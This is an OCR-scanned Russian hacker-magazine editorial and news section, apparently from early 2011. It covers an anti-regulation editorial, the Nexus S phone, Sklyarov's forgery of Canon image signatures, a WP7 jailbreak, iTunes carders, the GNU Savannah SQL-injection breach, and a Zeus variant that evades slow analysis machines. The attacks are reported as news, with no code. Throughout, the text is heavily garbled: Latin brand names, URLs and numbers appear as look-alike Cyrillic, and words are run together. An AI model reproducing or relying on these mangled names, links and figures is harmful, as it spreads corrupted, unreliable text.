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В последнее время часто думаю о том, что чем меньше 
контроля и регулирования со стороны государства 
— тем лучше простым людям жить, тем эффективней 
складывается экономика. Любая бюрократия, 
нормативные акты, ограничения и прочая хренота 
плодят целую армию да рмоедов-регуляторов, которые 
ничего не производят и заинтересованы лишь в 
одном — в дальнейшем усложнении процедур, чтобы 
больше получать денег, плодить коррупцию и чтобы без 
«работы» ни в коем случае не остаться. 

Если смотреть на Россию: самая эффективная, 
удобная людям, быстрорастущая и перспективная 
отрасльэкономики — это ІТ и интернет. Отрасльс 
минимальным влиянием государства. Іблетназад еще 
не было Яндекса — но вотталантливые люди пришли и 
построили с нуля супер-бизнес, компанию с оборотом 
300 млн. долл. Что уж говорить про огромный фриланс- 
рынок и кучууспешных стартапов, запущенных по 
всему миру русскоязычными людьми. 

В интернете все мы привыкли ктому, что это мир 
без ограничений. Любые вещи, начиная с обучения 
и заканчивая созданием бизнеса, здесь делаются 
инстант, безлюбого взаимодействия с дармоедами- 
чиновниками. Оченьзабавно при всем этом наблюдать 
нелепые попытки «регулирования» интернета, которые 
возникают в самых разных странах мира. Чиновники 
и политики видят в инете реальную угрозу для себя: 



во-первых, здесь они сталкиваются с адекватной, 
немодерируемой общественной оценкой своей 
деятельности, а во-вторых, они здесь не очень-то и 
нужны. Для нихэто странно, непонятно. Все, кчему 
они привыкли, здесь не работает. Добавь сюда полное 
непонимание принципов интернета — иты получишь 
явную причину для того вороха дебильных законов, 
инициатив и конфликтов, которые время от времени 
всплывают в самых разных странах. 

Ограничение работы 5куре, разнообразная копирастия, 
«михалковский» налог, национальные файрволы, 
закрытиеторрент-трекеров, фильтрация р2р-трафика, 
взымание налога за использование орепзоигсе, из 
пальца высосанные уголовные дела, признание ѴоиТиЬе 
экстремистским сайтом из-за одного ролика. 

Все это — проявления того, как отставшие от жизни 
чиновники, судьи и милиционеры воспринимают 
интернет. Своей «регулировкой» они пытаются 
противостоять развитию и эволюции человечества, 
но в силу своей некомпетентности не понимают 
элементарного: все ихусилия обречены на провал 
просто с базовой, с технической точки зрения. 

Именно поэтому я спокоен: ТОР, ѴРІ\І, 556 и О НТ спасут 
мир :). 

пікііо22 р гл. редХ 
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ВТОРОЙ «ГУГЛОФОН» ВЫПУЩЕН 



Состоялосьто, чего ждали очень многие: компания 
Соодіе выпустила свой второй смартфон ІЧехизЗ 
с ОС Ооодіе АпсІгоісІ 2.3 на борту. Правда, изгото- 
вителем в этот раз является не НТО, а Заппзипд. 
Прообразом нового Нексуса стала известная модель 
СаІахуЗ. Смартфон базируется на платформе 
Заппзипд НиттіпдЬігсІ, включающей в себя про- 
цессор СоПехА8 с частотой 1 ПГц, 512 МБ оператив- 
ной и 16 ГБ флеш-памяти для хранения данных. На 
ІЧехизЗустановлен 4-дюймовый (480x800) Зирег 
АМОБЕО дисплей ссенсорной панелью емкостного 
типа и покрытием, препятствующим появлению 
отпечатков пальцев. Интересно, что он имеет изог- 
нутую форму внешней поверхности — в результате 
получается так называемая «лодка». Телефон будет 
выпускаться для различнных стандартов сотовой 
связи, а также имеет модули для всех беспроводных 
технологий: ѴѴі-Рі 802.1 1 п/Ь/д, ВІиеІооШ 2.1+ЕОР 
и даже ІМеагЕіеІсІ Соттипісабоп (ІЧЕС). Помимо 



этого, смартфон укомплектован А-СРЗ, трехосным 
гироскопом, акселерометром, цифровым компасом, 
датчиками близости и освещенности. Основная 
5-мегапиксельная камера ІЧехизЗумеетзапи- 
сывать видео с разрешением 720x480, оснащена 
системой автофокусировки и вспышкой. А вспомо- 
гательный «глазок» (640x480 пикселей), располо- 
женный на передней панели смартфона, пригодится 
для видео-звонков. Если верить производителю, 
аккумулятор с емкостью 1 500 мАч обеспечитоколо 
7 часов работы в режиме разговора, а в режиме ожи- 
дания его должно хватить почти на 18 дней! Телефон 
выглядитсбалансированным во всех отношениях. 
Огорчаетлишьтотфакт, что в России ЫехизЗбудет 
комплектоваться более скромным Зирегсіеаг БСй- 
дисплеем. Ожидаемая стоимость цены в России 
— немногим дороже СаІахуЗ, то есть порядка 20-25 
тысяч рублей. Хотя в Штатах смартфон можно будет 
приобрести всего за $529 (цена без контракта). 





Мощность 00о5-атаки на сайт ѴѴікіІеакз превышала 10 Гбит/с. Теперь 
в списке официальных зеркал ресурса насчитывается 208 сайтов :). 



НОВЫЙ ГРОМКИЙ ВЗЛОМ ОТ СКЛЯРОВА 

В Праге, в ходе конференции СОІЧЕісІепсе 2.0, известный хакер, криптограф и сотрудник 
компании Е1сотзоП:Дмитрий Скляров представил новый доклад-бомбу. Дмитрий пове- 
дал слушателям о том, какемуудалось найти уязвимость и «вскрыть» алгоритм проверки 
подлинности фотографий Сапоп Огідіпаі Оаіа Зесигііу. Интересно, что Скляров пытался 
заблаговременно связаться с представителями Сапоп и сообщить им о дырке, но его 
попросту проигнорировали. В итоге система проверки подлинности фотографий полно- 
стью дискредитирована. Это очень серьезный инцидент, поскольку систему использо- 
вали и криминалисты, и юристы со всего мира. Фотографии проверяются по цифровой 
подписи Огідіпаі Оесізіоп Баіа (ООО), которая располагается в блоке ЕХІ Р Э РѲ -файлов 
и хранит в себе информацию о дате и месте съемки. Для проверки использовался 
дорогостоящий набор инструментов ОЗК-ЕЗ (Сапоп ОгідіпаШаІа Зесигііу Кіі], состоящий 
из смарт-карты и специального софта. Набор позволяетузнать, была ли фотография от- 
ретуширована и модифицировалисьли значения вродедаты съемки или координатСРЗ. 
Скляров обнаружил в алгоритме Сапоп брешь, которая позволяет подделать подпись 
и выдать модифицированное фото за оригинал. В доказательство взлома криптограф 
показал публике откровенные фотожабы (вроде Сталина с іРЬопе в руках), чья цифровая 
подписьсообщала, что«все в порядке». Проблема, найденная Скляровым, аппаратная. 
Трюке подделкой подписи сработает для многих профессиональных моделей Сапоп, в 
том числе Е0550 Магк II. Вся информация о найденнойуязвимости была опубликована в 
отрытом доступе (е1сопп5о1 : 1.сопп/сапоп.Ыпп[?г1=рг&г2=сапоп ). Сам Скляров посоветовал 
любимому производителю фотоаппаратов нанимать для разработки таких систем людей, 
которые действительно понимаюттолкв ИБ. 




► 004 
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ДЖЕЙЛ БРЕЙК ДЛЯ ѴѴІШѴѴ5 РЖЮЕ 7 



Не успело утихнуть обсуждение новой мобиль- 
ной платформы отМісгозоК, какхакеры по 
всему миру принялись ломать новинку. Успеха 
удалось добиться команде СЬеѵгопѴѴР7, о чем 
парни сообщили в своем официальном блоге 
[ сбеѵгопѵѵр7.сопп ). Хакеры не были голословны, 
когда заявили отом, что сумели получить полный 
доступ кѴѴР7 и возможность устанавливать на ус- 
тройство любые приложения в обход «Маркета». 
Рабочая утилита для джейлбрейка, выложенная 
на сайте, оказаласьлучшим подтверждением их 
слов. Разблокировав защиту системы, каждый 
получает возможность нетолько ставить любой 
софт, но и разрабатывать приложения для этой 
платформы, не покупая у МісгозоЙ специальный 



аккаунтѴѴіпсІоѵѵз Рбопе 7 Магкеіріасеза $99, без 
которого проверить работоспособность прило- 
жения на реальном железе невозможно. Тулза от 
СЬеѵгопѴѴР7 эту проблему решила бесплатно. 

Но не спеши набирать в браузере приведенную 
ссылку — проги для джейлбрейка ты там уже не 
найдешь. Почти сразу после релиза с командой 
связался глава отдела по разработке прило- 
жений для ѴѴіпсІоѵѵз Рбопе 7 Брендон Уотсон. 

Он сумел прийти ксоглашениюсхакерами, и 
одним изусловий этой договоренности стало 
немедленноеудалениеутилиты из Сети. Детали 
«сделки», разумеется, не разглашаются. Конеч- 
но, разработка СЬеѵгопѴѴР7, невзирая на эти 
меры, успела разлететься по Сети, но и здесь все 




нетакуж радужно. Теперь прога для джейл- 
брейка отказывается работать из-за отсутствия 
сертификата. Получается, что, хотя пальма 
первенства формально и отошла кпарням из 
СЬеѵгопѴѴР7, нормального джейлбрейка придет- 
ся еще подождать. 




К 2015 году компании Іпіеі, АМР, Реіі, І_епоѵо, Затзипд и І_В откажутся 
от использования в своих продуктах аналоговых видеоинтерфейсов Ѵ6А 
и ЬѴРЗ. Их заменят НРМІ и РізрІауРогІ. 



В ВЕЛИКОБРИТАНИИ 
КАРДЕРОВ-МУЗЬ 



ПОЙМАЛИ 



КАНТОВ 



Необычная история произошла недавно в англий- 
ском городе Вулвергемптоне. Местная полиция 
задержала 1 9-летнего Ламара Джонсона — члена 
кардерской группировки из двенадцати человек. 
Эти предприимчивые ребята использовали старую 
схему «за ра баты ва н и я » де н е г, и з вестну ю е ще со 
времен покупки собственной шароварной проги 
чужими кредитками. Джонсон и его товарищи раз- 
местили в іТипез и Атагоп свои музыкальныетре- 



ки и принялисьсами ихскачивать, расплачиваясь 
деньгами с ворованных банковских карт. Накачать 
они успели немало. В период с 2008 по 2009 год 
песни были скачаны более 6.000 раз, и Джонсон 
признаетсвое отношение к2.000 загрузок. Таким 
образом он успел «заработать» почти 500.000 
фунтов (около $750.000] авторских отчислений. С 
продажи одного трека эти «криминальные гении» 
получали около 80 фунтов, вто время каксредняя 




стоимость песни в ІТипез составляет99 пенсов. 

В конце декабря местный суд признал Ламара 
Джонсона, который и та к уже отбывает пяти летний 
тюремный срокза нанесениетяжелыхтелесных 
повреждений, виновным. Суд над остальными 
одиннадцатью членами группы состоится в конце 
января. 



ріаѵзта™ рнояе— неутка 

Циркулирующие по Сети слухи нашли неожиданное подтверждение: 
Ріаузіаііоп Рбопе оказался не выдумкой, а совершенно реальным уст- 
ройством, которое скоро выйдет в свет. Гибрид консоли Р5Р Со с АпбгоісІ- 
смартфоном пока носит рабочее название 2е из 21 , а его разработкой 
занимается компания 5опу Егісззоп. Официальный анонсустройства, по- 
хоже, состоится в феврале-марте текущего года, ну а пока нам приходится 
довольствоваться неофициальной инфой. Судя по всему, у известной 
серии игровыхтелефонов ІМокіа ІЧ-Саде появится достойный преемник 
:]. Устройство будет выполнено в виде слайдера, но место выезжающей 
клавиатуры займет фактически передняя панельджойстика — с похо- 
жими игровыми кнопками для управления. На задней панели девайса 
расположатся обычные для манипуляторов 5опу «шифты». По Сети пока 
распространяются фотографии и характеристики прототипа, и все еще 
может поменяться, но предварительные данныетаковы: габариты 2еиз 
21 аналогичны РБРСо, девайсбудет оснащен дисплеем диагональюЗ. 7», 
процессором с частотой 1 ГГц, 512 МБ оперативной памяти, тісгоЭБ-сло- 
том, а также 5-мегапиксельной фотокамерой. Ожидается, что официально 
разработку представят публике весной, в ходе конференции СеЬТ 2011. 
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МЕ6АЫЕѴѴ5 



РОССИЯ НА ВІ.АСКНАТ 




С 16 по 19 января в США (штат Вирджиния] пройдет ежегодная конфе- 
ренция «ВІаскНаІ ОС». Этот и вент является самым значимым между- 
народным событием в мире информационной безопасности, в рамках 
которого постоянно презентуются самые новыетехники взлома и 
защиты. Конференция, впервые состоявшаяся в 1 997 году, проходит 4 
раза в год и собирает более десяти тысяч посетителей, среди которых 
есть какхардкорные специалисты по взлому, таки «люди в костюмах»: 
руководители отделов безопасности крупнейших мировых компаний и 
сотрудники американских ведомств. Но это не главное. В этом году од- 
ним из докладчиков будет Александр Поляков, технический директор 
компании Оідіѣаі Зесигііу и руководитель исследовательского центра 
05ЕСР0, а также один из постоянных авторов ][. И это настоящий 
прорыв. Для справки: ранее на этой конференции не было ни одного 
докладчика, представляющего российский рынок консалтинга по И Б. 
И мы очень рады, что Саша наконец-то покажет всему миру: в России 
живут нетолько хакеры-криминалы, но и профессионалы в области 



информационной безопасности, способные проводить исследования 
мирового уровня. Тут надо сказать, что само событие неслучайно. Это 
следствие долгой работы 05ЕСН0 в области исследования безопас- 
ности бизнес-приложений. Перед ВІаскНаСом был ряд выступлений 
на не мен ее значимых европейских и азиатских конференциях: Нас к 
Іп ТЬе Вох, Эоигсе Вагсеіопа, БЕЕР5ЕС, СопЕбепсе, Тгоорегз. Теперь 
пришла очередь США :). Доклад полностью посвящен бизнес-прило- 
жениям корпоративного уровня: будет рассказано о том, как злоумыш- 
ленники могут получить доступ ко всем критичным данным компании, 
украсть деньги или разрушить технологическую сеть предприятия, 
используя простейшие уязвимости и ошибки в архитектуре. В качес- 
тве примера будут рассмотрены популярные в России и во всем мире 
ЕВР-системы. Отчет об этой грандиозной конференции из первых 
уст ты сможешь прочитать в ближайших номерах журнала, а краткое 
описание доклада посмотреть на ЬІаскЬаСсот/Ьіті/ЬЬ-сІс-І І/Ыі-бс-1 1 - 
ЬгіеЕпаз.бІт^ЭтііИ . 



» ѴѴігесІ сообщает, что одним из самых ходовых товаров на еВау 

являются... автомобили. За неделю одни только американцы покупают 
на еВау авто и запчастей к ним на сумму около $8 млн. 



РУЧКА ШПИОНА ИЛИ 

УДОБНЫЙ гаджет? 

Чего только не придумало человечество — и ручки 
с исчезающими чернилами, и ручки со встроенны- 
ми видеокамерами, и даже ручки, которыми можно 
одинаково успешно писать как на бумаге, так и на 
планшете. Устройство от компании Ареп — Е ЕЕІЫ 
АРЕЫ А2 — пошло еще дальше. С виду гаджет ничем 
не отличается от обычной ручки и прекрасно пишет на 
бумаге. Однако в комплекте с девайсом идет мини- 
атюрный беспроводной приемник, который крепится к 
бумаге ина лету оцифровывает все сделанные ручкой 
изображения и записи. Памяти устройства хватает 
в среднем на 1 00 страниц. Новинка работает как с 
ѴѴі псіоѵѵз, так и с Мае. Кроме того, чудо- ручку можно 
просто подключить к компьютеру и писать с ее помо- 
щью на изображениях, документах МісгозоО: СЖісе 
или сообщениях ОіЛІоок. Стоимость этого отличного 
гаджета — $100. 




► 006 
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НЕПРИЯТНОСТИ У БОРЦОВ ЗА СВОБОДНОЕ ПО 



Фонду свободного программного обеспечения (РгееЗоіФл/аге Роипбабоп], 
похоже, пора пересмотреть свой подход к сетевой безопасности. 
Неизвестные хакеры недавно провели успешную атаку на репозиторий 
Р5Р СЫИ ЗаѵаппаЬ [ заѵаппаЬ.дпи.огд І. Злоумышленники воспользова- 
лись дыркой в открытом ПО для хостинга Заѵапе, успешно осуществили 
50І_-инъекцию и в результате полностью слили Му50І_-базу с именами 
пользователей и хэшированными паролями. Успешно сбрутив хэш пасса 
одного из админов, взломщики сумели добавить скрытый статичный 
Ыті-файл в СѴ5-репозитарий, который изменил вид главной страни- 
цы дпи.огд. Впрочем, на дефейсе ребята останавливаться не собира- 
лись: имитутже был установлен рбр-скрипт реверс-шелла (по иронии 
распространяющийся полицензии 01414 СРР] и предприняты попытки 
внедрения руткитов. По словам представителей Р5Р, последнее вроде бы 
неувенчалосьуспехом, но полной уверенности в этом нет (это не стеб, а 
официальная формулировка]. Для восстановления работы и Заѵаппаб, и 
бЫИ пришлось полностью изолировать отСети. После случившегося все 
пароли на 6І\Ш ЗаѵаппаЬ были объявлены ненадежными. Теперьдля хра- 
нения паролей будет использоваться СгурЫѵЮб. Также сообщается, что 
исходные коды, размещенные в репозитории, в ходе атаки не пострадали, 
однако, опятьже, «полной уверенности в этом нет». 




» Журнал Тіте назвал основателя социальной сети ГасеЬоок Марка 
Цукерберга человеком года. Заметим, что в читательском голосовании 
на сайте с большим отрывом лидировал Джулиан Ассандж - за него отдали 
382 000 голосов. 



ВЕСТИ ИЗ «ПИРАТСКОЙ БУХТЫ» 




Мы давно не писали оТЬе РігаТе Вау, а между тем апелляционные слу- 
шания поделу команды трекера, наконец, закончились, и был оглашен 
официальный вердикт. Увы, суд Швеции постановил, что все трое 
основателей «Пиратской бухты» виновны, и увеличил им размер штрафа 
(правда, сократив при этом тюремные сроки]. Таким образом, Фредрик 



Нейдждолжен отсидеть за решеткой десять месяцев, Питер Сунде — 
восемь, а Карл Лундстрем — четыре месяца. Размер штрафа, который 
теперьдолжна выплатитьтроица, суммарно составляет $6.5 млн. 
Четвертый фигурант, Готфрид Свартхольм, не включен в решение суда, 
так какой отсутствовал на слушаниях по состоянию здоровья. Несмотря 
на такие невеселые новости, «пираты», какобычно, неунывают. Питер 
Сунде недавно написал у себя втвиттере, что пора бы сторонникам 
свободы информации подумать о создании собственного интернета. На 
деле речь идето независимой системе РЫБ, построенной на принци- 
пах р2р. Идея заключается втом, чтобы система не контролировалась 
нынешним регулятором Всемирной сети ІСАЫІЧ. И это не просто слова 
— похоже, у проекта уже имеются квалифицированные программисты, 
сетевые инженеры и специалисты по коммуникациям. Обсуждение идеи 
протекает на ІПС-канале бп5-р2р в сети ЕФер а свежая информация 
собирается по адресу с!о1:-р2р.огд . Тем не менее Питер Сунде честно 
заявляет, что не дает никаких гарантий реализации замысла, так как 
имеется и множество сложностей. К примеру, ІСАЫЫ отвечает не только 
за домены, но и за ІР-адреса. Однако попытаться активисты все равно 
намерены, поскольку наличие централизованной системы, которая 
управляет информацией в Сети, по их мнению — неприемлемо. 



» 



По данным компании АбарІіѵеМоЬіІе, за 2010 год количество атак, 
направленных на АпбгоісІ-смартфоны, выросло в 4 раза, зато іРІіопе 



стали атаковать в 2 раза реже. 
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МЕ6АЫЕѴѴ5 



Зй БЕЗ ОЧКОВ 

Различными ЗБ- новинка ми, казалось бы, уже пресытились все. Ими 
уже никого неудивишь. Но погоди переходить к чтению следующей 
новости — японская компания ЕІ20 скоро выпустит действительно не- 
обычный ЗБ- монитор. С БигаѴізіоп ЕБЕ2301 -ЗБ тебе не понадобится 
ни активных, ни пассивных очков — стерео-изображение будетвидно, 
что называется, невооруженным глазом, причем видно хорошо. И 
пусть тебя не пугаеттяжеловатый дизайн этого 23-дюймового чуда. 

В конце концов, это первый в мире монитор с Ри II Н 0 разрешением 
(1920x1080), способный сформировать стерео-картинку, для про- 
смотра которой не нужны очки. Кстати, монитор будеттяжел и в самом 
прямом смысле: почти 16 килограммов чистого веса :]. Да, некоторые 
читатели сейчас заметят, что «безочковая» 30-технология не нова и 
ктомуже имеет множество недостатков. Спешим успокоить: в новом 
детище ЕІ20 использован принцип направленной подсветки и алго- 
ритм задержекво времени (а не параллакс-барьер и не лентикулярные 
линзы, как в случае других производителей). То есть, изображение, 
предназначенное для левого и правого глаз, появляется на экране 
поочередно, используя одни итеже пиксели на экране. Благодаря этой 
особенности, муара и цветных полос, характерных для «безочкового» 
30 , на дисплее не наблюдается. Новинка будетукомплектована двумя 





разъемами ОѴІ-О и портом ѴЕЗАЗіегео 5упс, а также будет иметь не- 
сколько режимов настройки объемного изображения — в зависимости 
отусловий просмотра и количества зрителей. Посмотреть на монитор 
своими глазами можно будет совсем скоро: ЕІ20 планирует выпустить 
новинку в продажу уже во втором квартале текущего года. Цена девай- 
са пока не объявлена. 



ПЕРЕВОДЧИК БУДУЩЕГО 




Сколько раз все мы видели в кино различные девайсы, использующие в работе 
так называемую «дополненную реальность». Все эти фишки, которые мы при- 
выкли видеть на экранах кинотеатров и на страницах фантастических романов, 
с каждым днем становятся все ближе к реальности. Приложен иеѴѴогб Бепздля 
іРЬопе — оченьяркий примертакой фантастики, шагнувшей вжизнь. Програм- 
ма предназначена для перевода картинок и знаков с использованием допол- 
ненной реальности. Принцип ее работы прост: наводишь камеру іРЬопе’а на 
интересующий тебя текст (допустим, объявление на двери магазина), и прило- 
жение на лету перерисовывает картинку на экранетелефонатак, чтобы на ней 
отображался уже переведенный текст. Без задержек, полностью в реальном 
времени! Чтобы оценить, насколько это круто, стоит посмотреть видеоролик на 
сайте циезЕлзиаГсот. Самоеже поразительное, что это не концепт, не бета, а 
работающая прога, которая уже доступ на в іТипезпо цене $4.99. Единственная 
ложка деітя в этой бочке меда пока заключается втом, что ѴѴогб Еепз понимает 
только англо-испанское и испано-английское направления перевода. Мы бы 
назвали это«но» незначительным, таккакв скором времени авторы обещают 
расширить функционал приложения, добавив и другиеязыки. 




460 хакеров было арестовано за 2010 год в Поднебесной, если верить 
докладу, который недавно представили власти Китая. 



ПРИВЕРЕДЛИВЫЙ ТРОЯНЕЦ 



Новые сводки о ходе борьбы строяном 2еи5 
поступают ежедневно, нодалеко не всегда ока- 
зываются забавными. Специалисты из Е-5есиге 
обнаружили, что одна из новых модификаций 
зловреда работает исключительно на высокопро- 
изводительных компьютерах. Если частота СРБ 
оказывается меньше 2 ГГц, вирус ведет себя так, 
какесли бы обнаружил отладку, а именно — пре- 
рываетсвое выполнение и не заражает систему. 
Так, ноутбуки аналитиков ІВМ Т42 (с частой 1 .86 
ГГц) оказались слишком медленными, чтобытрой 



заразил систему :). Не совсем понятно, являлось 
ли конечной целью создание ботнета премиум- 
класса (например, для распределенного брут- 
форса) или это просто была очередная попытка 
усложнить анализ малвари. 

Всем хорошо известно, что любая антивирусная 
лаборатория ежедневно исследует десятки 
подозрительных бинарников. Единственная 
возможность справиться с та ким потоком файлов 
— автоматизировать процесс анализа. Каждый 
образецсначала сканируется, выполняется и 



анализируется внутри виртуального окруже- 
ния. Разработчики малвари, в свою очередь, 
пытаются максимально усложнить а нал из тел 
вирусов, встраивая в них различные приемы для 
антиотладки и обнаружения виртуальных машин. 
Так что есть шанс, что отсеивание компьютеров 
с частотой, меньшей двух ГГц является изощ- 
ренным способомуйти отанализа. По крайней 
мере, внутри виртуального окружения (у которого 
скромн ые технические характеристики) зараже- 
нияточно не произойдет. 



► 008 
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Исследование компании Аѵіга показало, что из 9000 опрошенных 
пользователей 25% хотя бы раз отключали антивирус, чтобы заставить 



компьютер работать быстрее. 



6006І.Е БОРЕТСЯ ЕАСЕВ00К УЧРЕЖДАЕТ 

С ПИРАТАМИ ХАКЕРСКИИ КОНКУРС 



Довольно неприятные новости сообщила через 
свой официальный блогкомпания Соодіе. Похоже, 
«Корпорация Добра» все больше поддается влиянию 
правообладателей и антипиратских организаций. В 
скором будущем из списка автозаполнения исчезнут 
различные «пиратские» слова. Хотя боодіе и не при- 
водит никаких конкретных примеров и признает, что 
будет сложно определить, какиетермины относятся к 
«пиратским», можно предположить, что первым делом 
нововведение коснется словесных конструкций вроде 
«скачать бесплатно» и «смотреть онлайн». Болеетого, 
в результатах поиска рядом со ссылками на неблагона- 
дежные ресурсы в скором времени начнут появляться 
предупреждения вида «Контент, размещенный на 
сайте, защищен авторским правом и используется 
без ведома правообладателя». Сайты такого рода 
будут располагаться в результатах поиска ниже своих 
«правильных» собратьев. Демократия и свобода слова 
какони есть. Однако копирасты, представь себе, все 
равно недовольны. По их мнению, Соодіе по-прежнему 
игнорирует суть проблемы, которая заключается втом, 
что поисковик«собственными руками» переправляет 
потребителей на пиратские ресурсы. Очевидно, для 
полного душевного спокойствия анти пиратов «Гугл» 
должен блокировать все подозрительные ресурсы и 
делать вид, что их вообще не существует. 



Если ты смотрел фильм «Социальная 
сеть», то должен был оценить, как для 
РасеЬоок’а набирали программистов. И 
воттеперь— реальный конкурс: проект 
Цукерберга объявил об учреждении 
ежегодного конкурса по алгоритмичес- 
кому программированию для хакеров 
со всего мира. Когда ты будешь читать 
эту заметку, первый кубок НаскегСир 
201 1 [ ІасеЬоок.сот/Ьаскегсир ] скорее 
всего, ксожалению, уже завершится. 

Регистрация на соревнование была 
открыта с 20 декабря по 10 января (сам 
конкурс проходит в онлайне]. Состяза- 
ние поделили натри этапа. Первым был 
квалификационный раунд. Участникам 
предложили три задачи, и чтобы пройти 
в следующий раунд, необходимо было в 
течение 72 часов решить хотя бы одну из 
них. Те, кто справился сзаданием, были 
допущены до следующих этапов. 

В ходе финала должны определиться 300 лучших хакеров (они получат официальные фут- 
болки НаскегСир] и 25 самыхлучших. Последние могут рассчитывать на призы посерьезнее 
маек: $5000 за первое место, $2000 за второе, $1000 за третье и по $1 00 за места с 4-го по 
25-е. Суммы, конечно, не заоблачные, но к ним прилагаются билеты в Калифорнию и прожи- 
вание в кампусе РасеЬоок в Пало-Альто. 
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» В новой версии боодіе СНготе было исправлено более 800 ошибок 
и закрыто 13 уязвимостей, 4 из которых были критическими. 

В рамках этого обновления боодіе потратил $4000 на вознаграждения 
за обнаруженные дырки. 



КОЕ-ЧТО ПОКРУЧЕ ІРЗ-МАТРИЦ 




Приятная новость для всех, кто ценит 
качество изображения, пришла из стана 
компании Сатзипд. Недавно производитель 
продемонстрировал дисплеи, построенные 
на новой технологии Сире г РІ_С (Ріапе Іо 
І_іпе СѵѵіІсЫпд), которая по ряду параметров 
превосходит хорошо зарекомендовавшую 
себя матрицу ІР5. В Сатзипд рассказали, 
что ими было подано более тридцати заявок 
на регистрацию патентов, связанных с Сирег 
РІ_5. Благодаря новой технологии, ориенти- 
рованной на использование в смартфонах 



и планшетных ПК, специалистам Сатзипд 
МоЬіІе Оізріауудалосьувеличить яркость 
дисплеев на 10% и существенно расширить 
углы обзора. СРБС-дисплеи на данный 
момент могут иметь разрешение вплоть до 
ѴѴХѲА (1366x768 пикселей). Не менее важно и 
то, что в производстве технология Сирег РІ_С 
будет на 1 5% дешевле ІРС. Серийный выпуск 
новых панелей стартует в начале текущего 
года, так что вполне вероятно, что флагманы 
с новыми дисплеями на борту появятся уже к 
концу 201 1-го. 
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НЕПРОСТАЯ ВИДЕОКАРТА ОТѴІЗКЖТЕК 



Устройство с мрачноватым названием Кіііег 
НО 5770 выпустила в свет компания ѴізіопТек. 
Эта РСІ Ехргезз карточка в первую очередь 
ориентирована на поклонников онлайновых 
игр, а эти ребята, как известно, не особенно 
требовательны к графике, но очень щепитильно 
относятся к сетевому пингу, то есть задерж- 
ке при обращении ксерверу. Стабильное и 
быстрое соединение с интернетом — главное. 

В ѴізіопТек решили подойти к этому вопросу 
нетривиальным методом и интегрировали пря- 
мо в видюху сетевой адаптер Відіооі ІМеІѵѵогкз 
Кіііег Е21 00. Это доработанная версия девайса 



Кіііег 2 1 00 — сетевой карты, оптимизированной 
специально для онлайновых игрищ. Впрочем, 
и графический процессор здесь использован 
не изсамыхслабых: АМБ Вабеоп НО 5770 
поддерживает БігесіХ 1 1 , предусматривает 
возможность подключения нескольких монито- 
ров и вывод многоканального (7.1) звука через 
интерфейс НОМІ. Цена устройства за океаном 
составляет примерно $200. Кстати, это далеко 
не единственный примертакого нецелевого 
использования шины РСІ-Е. В продаже также 
можно найти, например, РСІ-ЕЭЗО-накопи- 
тели. Ширина пропускания РСІ-Е позволяет 



выжать максимум от использования ЭЭЭ-нако- 
пителей. Скорость передачи данных на чтение 
утаких девайсов часто составляет порядка 750 
Мб/с, а назапись — 700 Мб/си выше! 



МЕ6АЫЕѴѴ5 



» УоиТиЬе снова поднимает планку максимальной длины видеороликов. 

Отныне юзеры, ни разу не нарушавшие правила сервиса, имеют 
возможность загружать на ѴоиТиЬе ролики длительностью более 15 минут. 



СОСТОЯЛСЯ РЕГИОНАЛЬНЫЙ ПОЛУФИНАЛ АСМ ІСРС 




В ноябре в Санкт-Петербурге (а также в 
Барнауле, Тбилиси и Ташкенте] состоялся 
полуфинал командного чемпионата мира 
по программированию (АСМ ІСРС] в Севе- 
ро-Восточном Европейском регионе. АСМ 
ІСРС — это крупнейшая в мире студенческая 
командная олимпиада по программированию. 
Крупные компании каждый год внимательно 
следятза чемпионатом и присматривают 
будущие кадры, понимая, что главный ресурс 



ІТ-индустрии — это, безусловно, мозги. 

Россия впервые получила право на органи- 
зацию полуфинальной Северо-Восточной 
Европейской группы в сезоне 1996-1997, и с 
тех пор команды наших вузов не раз завоевы- 
вали на чемпионате призовые места. В этом 
году в четвертьфинальных и полуфинальных 
соревнованиях приняли участие 720 команд 
из 260 вузов России и стран ближнего зару- 
бежья (Эстонии, Узбекистана, Литвы, Грузии, 
Белоруссии и других]. 

В ходе полуфинала определяются команды, 
которые поедут отстаивать честь своего вуза, 
страны и региональной группы в финале. 
Правила чемпионата таковы: в каждой коман- 
де три человека и на троих один компьютер. 
Командам дается пять часов времени и от 
восьми до двенадцати задач. Заметим, что 
отуровня сложности этих задач у любого 
программиста средней руки попросту вскипит 
мозг :]. Побеждаетта команда, которая решит 
наибольшее число задач, затратив на это 
наименьшее количество времени. Решения 
участники пишут на С, С++ или баѵа и отправ- 



ляют на тестирующий сервер. Какие именно 
тесты там крутятся, участники не знают, а 
задачу недостаточно просто решить правиль- 
но — нужно еще уложиться в определенные 
ограничения по времени, памяти и так далее. 
Каждая неудачная попытка решения — плюс 
двадцать минут к штрафному времени коман- 
ды (которое изначально равняется нулю]. 

В этом году места в полуфинале распредели- 
лись следующим образом: первое место вполне 
предсказуемо досталось команде СПбГУ ИТМО 
(команды этого университета побеждали в 
финале АСМ ІСРС трижды, а звание чемпио- 
нов России завоевывали пять раз]; второе и 
третье места остались за командами МГУ (что 
тоже неудивительно — МГУ давно «дышит в 
спину» своим петербуржским коллегам). Всего 
на финал ІСРС 2010-201 1 , который пройдет 
в начале марта в Египте, от ІЧЕЕРС поедут 13 
команд. Узнать подробности, ознакомиться с 
задачами и другой информацией ты можешь 
на официальном сайте чемпионата: ісрс.ЬауІог. 
еби. Интересно, будут ли участники решать там 
задачи по обнаружению акул? 



СВЕРХСКОРОСТНАЯ ФЛЕШКА 



Новая серия флешекот компании Раігіоі Метогу 
итакбыла бы быстрой — устройства, получившие 
имя Зирегзопіс, работаютс новым интерфейсом 
115В 3.0. Но в Раігіоі решили пойти дальше и 
сделать свои новинки очень быстрыми. Скорость 
записи и чтения этихдевайсов составит70 и 100 
МБ/с соответственно (против обычных 60 и 80 



МБ/с]. Добиться таких показателей разработчи- 
кам Раігіоі удалось путем внесения некоторых 
изменений в привычную конструкцию флешек. 
Из обычной последовательности «флеш-память 
-> контроллер флеш-памяти мост-> контрол- 
лер 115В» был исключен мост, а контроллеры 
памяти и интерфейса 115В 3.0 разместились на 



одной микросхеме. Благодаря этим особеннос- 
тям удалось уменьшить и размер устройств. Обе 
новинки, емкость которых составляет32 и 64 ГБ, 
щеголяютпрочными алюминиевыми корпусами. 
Цена девайсов, ксожалению, пока неизвестна, 
но продажи должны начаться совсем скоро — в 
первом квартале 2011. 
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ЕАСЕВООК УЧИТСЯ 
УЗНАВАТЬ ЮЗЕРОВ В ЛИЦО 

В официальном блоге РасеЬоок появился интересный анонс, обещающий, что социальная сеть в скором 
